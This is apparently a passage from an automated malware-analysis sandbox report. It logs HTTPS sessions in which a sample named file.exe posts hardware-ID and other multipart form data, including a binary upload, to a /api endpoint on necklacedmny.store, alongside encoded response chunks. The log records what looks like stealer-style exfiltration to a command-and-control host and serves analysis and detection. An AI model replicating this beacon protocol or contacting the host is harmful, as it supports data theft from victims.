                                                                                  2024-10-31 09:15:05 UTC358INData Raw: 32 35 38 34 0d 0a 68 58 4b 7a 35 7a 32 50 4a 44 61 32 76 46 6d 6a 38 6e 76 43 6a 38 78 31 37 42 2f 71 6b 74 50 67 2b 7a 46 6d 64 54 62 36 35 4a 6a 2b 55 4d 58 46 42 37 73 49 46 4d 58 5a 65 35 6d 47 43 62 66 71 34 46 65 4e 65 38 69 6f 74 59 47 58 51 67 4e 5a 46 49 79 4a 75 72 38 55 30 6f 74 4f 36 67 67 55 30 38 52 37 6d 61 6b 41 34 4f 71 69 56 39 59 39 6a 2f 69 78 67 5a 64 54 42 78 35 5a 69 6f 6a 37 37 52 37 55 6a 31 6a 73 51 46 66 61 30 54 7a 47 6c 78 71 6f 34 61 55 59 68 48 4c 49 76 76 47 46 67 52 4e 63 56 33 75 66 6b 50 6e 49 45 38 43 4d 48 2f 49 49 54 5a 54 5a 4e 34 48 49 57 61 50 71 72 68 6d 4b 65 34 48 36 75 34 69 66 55 67 49 66 52 70 4f 43 38 4f 30 51 31 34 35 53 35 56 52 61 30 4e 59 33 77 4a 30 61 34 4b 50 75 45 4a 59 39 30 4c 44 69 73 4a 70 43 46
                                                                                  Data Ascii: 2584hXKz5z2PJDa2vFmj8nvCj8x17B/qktPg+zFmdTb65Jj+UMXFB7sIFMXZe5mGCbfq4FeNe8iotYGXQgNZFIyJur8U0otO6ggU08R7makA4OqiV9Y9j/ixgZdTBx5Zioj77R7Uj1jsQFfa0TzGlxqo4aUYhHLIvvGFgRNcV3ufkPnIE8CMH/IITZTZN4HIWaPqrhmKe4H6u4ifUgIfRpOC8O0Q145S5VRa0NY3wJ0a4KPuEJY90LDisJpCF
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 33 4e 55 77 78 49 49 53 71 65 43 6a 46 34 4e 33 68 2f 4f 78 68 5a 4e 5a 43 78 31 51 6c 59 76 38 35 78 43 52 79 78 2f 71 58 68 53 4d 6e 68 6a 45 67 42 36 73 2b 2b 77 74 7a 6d 4c 47 36 66 47 46 6c 52 4e 63 56 31 79 64 68 66 6e 73 48 39 4b 4e 56 50 39 47 52 74 4c 54 50 74 4f 57 48 4b 37 6e 72 51 57 45 63 34 37 7a 75 49 6d 51 56 67 4d 54 46 4e 62 47 2f 66 39 51 69 63 56 2b 34 45 31 59 33 73 6b 37 67 59 39 58 75 61 32 70 47 38 34 6c 79 50 53 77 68 70 68 58 43 68 6c 51 6c 49 44 30 36 68 2f 58 6a 31 2f 71 54 46 7a 63 33 7a 62 4b 6e 78 6d 6c 34 4b 6f 52 67 6e 79 4e 73 50 2f 43 6e 6b 74 45 54 78 53 32 67 66 6e 31 55 75 53 47 55 65 4e 42 51 70 54 42 64 64 6a 51 48 71 79 74 39 6c 65 41 65 49 66 69 73 4a 43 63 58 52 59 62 55 5a 36 4c 2b 65 6b 51 31 49 4a 53 34 30 42
                                                                                  Data Ascii: 3NUwxIISqeCjF4N3h/OxhZNZCx1QlYv85xCRyx/qXhSMnhjEgB6s++wtzmLG6fGFlRNcV1ydhfnsH9KNVP9GRtLTPtOWHK7nrQWEc47zuImQVgMTFNbG/f9QicV+4E1Y3sk7gY9Xua2pG84lyPSwhphXChlQlID06h/Xj1/qTFzc3zbKnxml4KoRgnyNsP/CnktETxS2gfn1UuSGUeNBQpTBddjQHqyt9leAeIfisJCcXRYbUZ6L+ekQ1IJS40B
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 64 6a 51 48 71 79 74 39 6c 65 43 64 49 6a 37 75 34 61 5a 56 41 6b 53 56 35 2b 46 39 2b 41 61 33 34 4a 62 34 55 39 5a 30 74 34 38 78 5a 55 4c 70 65 53 69 47 38 34 7a 79 50 65 70 77 73 45 54 4b 78 42 43 6d 36 6e 35 39 68 6d 52 6d 68 48 30 42 6c 50 59 6e 6d 4f 42 6c 78 79 6f 35 71 67 66 6a 6d 2b 4e 2f 72 71 44 6b 31 55 46 47 6c 69 65 68 76 76 6e 46 74 32 46 57 4f 70 55 52 74 48 59 4b 63 76 51 56 2b 44 71 74 6c 66 57 50 62 37 67 70 70 4f 50 45 54 45 55 57 70 61 42 37 4b 63 50 6e 35 77 66 36 6b 6f 55 6a 4a 34 77 77 5a 77 65 71 4f 75 71 48 34 46 79 67 65 4b 77 6a 70 64 42 41 78 64 64 6c 6f 6e 32 37 68 33 57 69 46 54 6e 53 31 44 54 33 33 75 50 30 42 36 34 72 66 5a 58 75 47 32 46 2f 4a 2b 4a 6c 56 70 45 43 42 71 42 78 76 33 72 55 49 6e 46 57 2b 46 4f 58 74 76 58
                                                                                  Data Ascii: djQHqyt9leCdIj7u4aZVAkSV5+F9+Aa34Jb4U9Z0t48xZULpeSiG84zyPepwsETKxBCm6n59hmRmhH0BlPYnmOBlxyo5qgfjm+N/rqDk1UFGliehvvnFt2FWOpURtHYKcvQV+DqtlfWPb7gppOPETEUWpaB7KcPn5wf6koUjJ4wwZweqOuqH4FygeKwjpdBAxddlon27h3WiFTnS1DT33uP0B64rfZXuG2F/J+JlVpECBqBxv3rUInFW+FOXtvX
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 36 6b 36 36 46 58 77 44 32 50 36 50 48 61 32 58 77 6a 49 68 61 35 76 4c 72 34 58 73 6a 46 57 4f 45 47 44 4a 54 53 4f 4d 32 59 46 71 62 6b 6f 68 32 48 64 6f 54 37 74 59 36 51 56 67 49 57 55 5a 32 48 2f 75 73 61 31 34 5a 63 34 6b 6c 62 33 4a 35 31 67 5a 63 42 34 4c 58 75 4d 70 6c 32 68 76 62 78 6e 64 64 4b 52 42 42 59 32 4e 36 36 36 78 6e 58 67 31 72 68 52 31 4c 63 32 7a 50 46 6b 52 2b 6d 37 71 45 54 69 33 79 48 39 4c 32 4d 6b 31 49 46 47 31 2b 58 6a 66 2b 6e 58 70 47 43 52 36 30 65 46 4f 58 64 4c 64 61 41 46 65 44 79 34 41 37 4f 65 6f 53 77 36 63 4b 59 51 51 34 64 57 70 32 4a 2f 2b 51 66 31 6f 68 5a 34 55 78 64 33 4e 67 30 79 49 49 61 72 4f 4f 70 47 59 4a 7a 68 66 71 79 6a 39 6b 64 52 42 42 4d 32 4e 36 36 79 78 66 63 71 31 54 68 51 52 54 4c 6b 43 4b 42 6c
                                                                                  Data Ascii: 6k66FXwD2P6PHa2XwjIha5vLr4XsjFWOEGDJTSOM2YFqbkoh2HdoT7tY6QVgIWUZ2H/usa14Zc4klb3J51gZcB4LXuMpl2hvbxnddKRBBY2N666xnXg1rhR1Lc2zPFkR+m7qETi3yH9L2Mk1IFG1+Xjf+nXpGCR60eFOXdLdaAFeDy4A7OeoSw6cKYQQ4dWp2J/+Qf1ohZ4Uxd3Ng0yIIarOOpGYJzhfqyj9kdRBBM2N66yxfcq1ThQRTLkCKBl
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 75 54 38 35 4c 6a 2b 43 68 67 64 74 69 45 68 52 43 6b 34 76 32 70 77 2b 66 6e 42 2f 71 53 68 53 4d 6e 6a 33 4f 6d 52 71 76 37 4b 63 62 67 33 69 42 39 62 43 45 6e 56 6b 4f 46 31 4b 65 68 2f 2f 74 45 39 43 50 56 75 70 4f 55 39 66 4d 65 34 2f 51 48 72 69 74 39 6c 65 6e 65 70 72 2b 6f 63 4b 47 48 52 31 58 55 35 54 47 6f 71 63 55 32 34 70 62 36 6b 70 53 30 64 67 32 77 4a 38 59 6f 4f 4b 71 48 49 64 37 69 66 32 30 6a 35 31 42 44 68 78 62 6c 49 2f 32 36 6c 43 66 78 56 6a 31 42 67 79 55 37 7a 62 50 6e 68 36 32 72 62 46 5a 6c 7a 32 50 2f 50 48 61 32 56 49 49 47 46 65 58 68 66 6e 6d 47 73 4f 58 55 2b 52 4f 55 64 6a 56 4e 63 65 43 48 36 2f 6b 72 52 53 48 65 6f 44 38 75 34 47 65 45 30 70 58 55 34 44 47 6f 71 63 7a 78 70 56 53 72 56 6b 61 7a 5a 34 38 7a 64 42 42 34 4f
                                                                                  Data Ascii: uT85Lj+ChgdtiEhRCk4v2pw+fnB/qShSMnj3OmRqv7Kcbg3iB9bCEnVkOF1Keh//tE9CPVupOU9fMe4/QHrit9lenepr+ocKGHR1XU5TGoqcU24pb6kpS0dg2wJ8YoOKqHId7if20j51BDhxblI/26lCfxVj1BgyU7zbPnh62rbFZlz2P/PHa2VIIGFeXhfnmGsOXU+ROUdjVNceCH6/krRSHeoD8u4GeE0pXU4DGoqczxpVSrVkazZ48zdBB4O
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 63 6f 66 35 75 49 61 52 55 41 51 54 55 4a 2b 44 2b 65 73 62 31 6f 5a 51 36 55 39 61 33 64 46 37 6a 39 41 65 75 4b 33 32 56 36 39 6d 69 2f 79 38 77 6f 59 64 48 56 64 54 6c 4d 61 69 70 78 7a 66 67 46 2f 6e 51 46 44 52 32 44 48 45 6b 42 4b 6a 34 71 6f 52 69 6e 4b 49 2b 37 69 44 6e 31 59 4f 48 46 4b 56 68 66 7a 68 55 4a 2f 46 57 50 55 47 44 4a 54 2b 49 4d 79 63 48 75 44 79 34 41 37 4f 65 6f 53 77 36 63 4b 53 58 77 41 51 56 4a 57 46 38 75 49 55 32 34 42 66 35 56 52 63 31 4e 6b 70 30 35 41 51 70 65 47 74 46 34 70 37 67 66 61 79 68 74 6b 64 52 42 42 4d 32 4e 36 36 79 68 7a 57 72 46 6a 32 42 6b 75 61 78 33 76 47 6e 46 6e 34 72 61 38 63 68 48 4b 46 38 37 65 42 6b 6c 59 4f 46 6c 4f 51 69 2b 6a 6b 48 39 36 42 58 2b 4a 41 55 74 58 52 50 63 61 5a 47 4b 6a 71 37 6c 6e
                                                                                  Data Ascii: cof5uIaRUAQTUJ+D+esb1oZQ6U9a3dF7j9AeuK32V69mi/y8woYdHVdTlMaipxzfgF/nQFDR2DHEkBKj4qoRinKI+7iDn1YOHFKVhfzhUJ/FWPUGDJT+IMycHuDy4A7OeoSw6cKSXwAQVJWF8uIU24Bf5VRc1Nkp05AQpeGtF4p7gfayhtkdRBBM2N66yhzWrFj2Bkuax3vGnFn4ra8chHKF87eBklYOFlOQi+jkH96BX+JAUtXRPcaZGKjq7ln
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 72 75 46 69 56 51 54 47 42 54 57 78 76 57 6e 53 4f 6a 46 56 75 70 64 52 63 4c 54 4b 38 62 51 4a 75 36 74 74 6c 66 57 50 62 33 7a 76 34 79 65 52 52 56 61 63 34 36 4d 2f 66 63 58 78 6f 6f 66 6f 77 5a 53 6c 49 5a 6f 6a 39 41 64 73 61 33 32 52 39 77 6d 33 61 50 6d 30 73 74 4d 53 67 34 55 6a 73 61 69 74 56 36 52 6c 78 2b 31 42 68 50 58 7a 43 6e 48 6b 77 2b 6a 71 70 41 70 71 57 65 46 39 71 61 54 70 32 30 44 44 56 6d 65 6b 65 75 72 42 64 4b 4c 55 65 70 51 46 4a 71 65 4e 49 48 49 49 4f 43 6c 37 69 6a 41 50 5a 43 77 36 63 4b 73 55 41 6f 5a 55 34 36 58 74 38 41 4b 33 49 4e 49 2f 41 59 61 6c 4e 68 37 6d 63 42 58 34 4f 6d 2f 56 39 59 74 32 71 76 6b 30 63 34 44 56 67 67 61 67 63 62 73 70 30 69 44 79 78 2f 2f 42 67 79 55 6d 54 6a 54 67 68 2b 6a 2b 36 31 51 73 45 4f 6d
                                                                                  Data Ascii: ruFiVQTGBTWxvWnSOjFVupdRcLTK8bQJu6ttlfWPb3zv4yeRRVac46M/fcXxoofowZSlIZoj9Adsa32R9wm3aPm0stMSg4UjsaitV6Rlx+1BhPXzCnHkw+jqpApqWeF9qaTp20DDVmekeurBdKLUepQFJqeNIHIIOCl7ijAPZCw6cKsUAoZU46Xt8AK3INI/AYalNh7mcBX4Om/V9Yt2qvk0c4DVggagcbsp0iDyx//BgyUmTjTgh+j+61QsEOm
                                                                                  2024-10-31 09:15:05 UTC1040INData Raw: 70 64 43 68 42 43 69 63 76 64 36 52 66 51 6b 30 2f 36 53 52 53 61 6e 6a 32 42 79 45 76 75 72 61 6f 47 7a 69 58 59 6f 75 72 58 79 67 52 55 52 55 76 57 6e 37 72 78 55 49 6e 58 45 61 31 55 46 49 79 65 66 4d 4b 43 43 36 62 75 75 42 54 4a 51 37 62 58 76 34 57 59 52 52 51 41 57 39 65 6f 7a 4d 59 75 37 35 42 63 34 30 68 54 77 73 39 37 6a 39 41 57 34 4c 57 58 56 38 59 39 74 37 37 78 6d 74 6b 4c 52 43 4a 58 6c 6f 6a 39 38 51 47 63 6f 6c 48 71 52 30 4c 45 79 54 53 4f 76 69 2b 42 72 65 42 58 69 44 33 51 6f 76 2f 43 6e 55 4a 45 54 77 54 4b 33 61 2b 30 52 34 48 58 51 4b 4e 66 46 4d 4b 65 59 35 50 65 57 62 4b 74 39 6c 66 4a 66 70 72 69 74 34 47 50 55 45 4d 70 61 72 2b 49 2f 65 59 47 77 59 68 54 7a 45 56 46 33 75 41 46 31 4a 4d 58 72 75 71 34 42 73 34 7a 79 50 2f 78 32
                                                                                  Data Ascii: pdChBCicvd6RfQk0/6SRSanj2ByEvuraoGziXYourXygRURUvWn7rxUInXEa1UFIyefMKCC6buuBTJQ7bXv4WYRRQAW9eozMYu75Bc40hTws97j9AW4LWXV8Y9t77xmtkLRCJXloj98QGcolHqR0LEyTSOvi+BreBXiD3Qov/CnUJETwTK3a+0R4HXQKNfFMKeY5PeWbKt9lfJfprit4GPUEMpar+I/eYGwYhTzEVF3uAF1JMXruq4Bs4zyP/x2
                                                                                  2024-10-31 09:15:05 UTC1369INData Raw: 31 65 65 38 0d 0a 69 31 47 74 57 52 72 4e 6e 69 32 42 79 45 72 75 72 62 78 58 31 6a 33 50 2f 72 79 44 6d 6c 30 48 42 55 61 65 68 65 7a 6b 56 2b 2b 37 65 75 42 4c 55 64 72 5a 42 66 2b 78 45 37 44 67 6f 52 44 4d 58 59 2f 6d 73 72 79 6e 5a 42 55 51 52 4e 71 67 2b 66 45 54 6b 63 73 66 39 51 59 4d 6c 50 38 78 30 5a 30 57 70 36 2b 4f 45 4a 68 2b 79 4c 37 78 68 74 6b 4c 52 44 4a 5a 6c 59 50 30 34 46 4c 77 6a 30 2f 67 53 56 4f 57 2f 6a 7a 58 6b 31 6e 75 72 61 4a 58 31 6a 32 4a 2b 71 47 50 6c 6c 52 49 45 45 36 66 78 72 53 6e 48 70 48 64 48 2b 78 4d 52 4e 6e 52 50 49 32 57 46 36 36 74 73 56 6d 58 50 5a 36 77 36 64 48 58 45 78 5a 58 44 4e 6a 42 2b 66 55 43 31 34 5a 4a 37 67 46 71 36 76 4d 70 78 6f 41 61 34 74 79 6a 45 35 68 6f 69 2b 43 32 76 4b 64 2b 46 68 42 45 6d
                                                                                  Data Ascii: 1ee8i1GtWRrNni2ByErurbxX1j3P/ryDml0HBUaehezkV++7euBLUdrZBf+xE7DgoRDMXY/msrynZBUQRNqg+fETkcsf9QYMlP8x0Z0Wp6+OEJh+yL7xhtkLRDJZlYP04FLwj0/gSVOW/jzXk1nuraJX1j2J+qGPllRIEE6fxrSnHpHdH+xMRNnRPI2WF66tsVmXPZ6w6dHXExZXDNjB+fUC14ZJ7gFq6vMpxoAa4tyjE5hoi+C2vKd+FhBEm


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.649711188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:06 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 12864
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-31 09:15:06 UTC12864OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 39 31 36 44 34 31 36 45 45 35 35 32 42 41 44 43 30 34 36 41 41 30 36 34 30 30 35 45 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"35C916D416EE552BADC046AA064005E5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-31 09:15:06 UTC1022INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:06 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=sgtn2q8ucqh8rvdvipfgu8olpm; expires=Mon, 24-Feb-2025 03:01:45 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2BuomiO8A5RrkcEwDmJi4%2Fo2apwrefyG9o%2FcreVqIE1HbzoOEaHImg3lgbcbNGPgn0CjW3HbmpNvB83Yf6GltQRD9MWqLosw8f5sSU%2BfZ%2F%2FqhmyRsSHr2flo2CcgIwdFmy4GdOo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db289e2eb70e5a5-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2846&recv_bytes=13806&delivery_rate=2445945&cwnd=251&unsent_bytes=0&cid=40e527de0a2c6826&ts=534&x=0"
                                                                                  2024-10-31 09:15:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.77
                                                                                  2024-10-31 09:15:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.649713188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:07 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15110
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-31 09:15:07 UTC15110OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 39 31 36 44 34 31 36 45 45 35 35 32 42 41 44 43 30 34 36 41 41 30 36 34 30 30 35 45 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"35C916D416EE552BADC046AA064005E5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-31 09:15:07 UTC1018INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:07 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=oui9151cdp9blgm34aa7r3f9km; expires=Mon, 24-Feb-2025 03:01:46 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VK1SVCQ25vKFP%2BM%2BkgMr4y9cuNEBVaKyDV3MgZLybvlI9zWeXAR8N7wFFoZ9JTtyvi481%2BQUyUtSTu59bMn1cSNhrzFhx3ZBDq3uvRHlMcUixv1kj%2Bk9OBTPc4TMvENj4s8RIQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db289eacf563aac-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1091&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16052&delivery_rate=2547053&cwnd=245&unsent_bytes=0&cid=d51e1824efe4ff3c&ts=603&x=0"
                                                                                  2024-10-31 09:15:07 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.77
                                                                                  2024-10-31 09:15:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.649714188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:08 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 19968
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-31 09:15:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 35 43 39 31 36 44 34 31 36 45 45 35 35 32 42 41 44 43 30 34 36 41 41 30 36 34 30 30 35 45 35 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"35C916D416EE552BADC046AA064005E5--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                  2024-10-31 09:15:08 UTC4637OUTData Raw: f0 03 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70
                                                                                  Data Ascii: +?2+?2+?o?Mp5p
                                                                                  2024-10-31 09:15:09 UTC1023INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:09 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=812m1m37rm1htde81mb1lfs1fa; expires=Mon, 24-Feb-2025 03:01:48 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uRJGdxAtUWGEOTdaOySoUlcwkVnMOJV1F7a3c9WqwUo8qetcqQx0YWcN6VRLTmeYW4qQG1EU4%2FJoP7vX4%2B6QqPY2b%2BS%2BMCcLEPYpIUON7zc2dC64too%2BIPxHf%2FhozfdHGOZB5jc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db289f3a8172cd2-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1395&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2845&recv_bytes=20932&delivery_rate=2081955&cwnd=247&unsent_bytes=0&cid=71a11bb96e1cd0ec&ts=662&x=0"
                                                                                  2024-10-31 09:15:09 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 0d 0a
                                                                                  Data Ascii: 11ok 173.254.250.77
                                                                                  2024-10-31 09:15:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.649715188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:10 UTC283OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1219
                                                                                  Host: necklacedmny.store
